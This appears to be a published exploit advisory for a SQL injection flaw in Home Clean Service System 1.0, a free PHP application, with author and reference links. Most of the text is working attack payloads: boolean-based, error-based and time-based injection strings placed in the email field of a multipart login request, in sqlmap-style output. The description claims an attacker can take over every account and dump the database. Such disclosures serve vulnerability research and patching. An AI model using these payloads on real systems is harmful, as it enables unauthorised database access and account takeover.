Headline
Home Clean Service System 1.0 SQL Injection
Home Clean Service System version 1.0 suffers from a remote SQL injection vulnerability.
## Title: Home Clean Service System v1.0 - 2022 SQLi## Author: nu11secur1ty## Date: 04.27.2022## Vendor: https://www.sourcecodester.com/users/acetech## Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System## Description:The `password` parameter appears to be vulnerable to SQL injection attacks.A single quote was submitted in the password parameter, and a databaseerror message was returned.Two single quotes were then submitted and the error message disappeared.The attacker can take administrator account control and also of allaccounts on this system, also the malicious user can download allinformation about this system.Status: CRITICAL[+] Payloads:```mysql---Parameter: MULTIPART email ((custom) POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"[email protected]' OR NOT 6564=6564-- aWQp------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx-- Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY orGROUP BY clause (FLOOR) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"[email protected]' AND (SELECT 6279 FROM(SELECTCOUNT(*),CONCAT(0x7176716271,(SELECT(ELT(6279=6279,1))),0x716a767871,FLOOR(RAND(0)*2))x FROMINFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- LSfT------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx-- Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: ------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="email"[email protected]' AND (SELECT 4830 FROM(SELECT(SLEEP(5)))kgBM)-- GxTm------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="password"t8I!x2y!H3'------WebKitFormBoundary8kMPLwTOJeesgEBxContent-Disposition: form-data; name="login"------WebKitFormBoundary8kMPLwTOJeesgEBx-----```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/acetech/2022/Home-Clean-Service-System)## Proof and Exploit:[href](https://streamable.com/l107o6)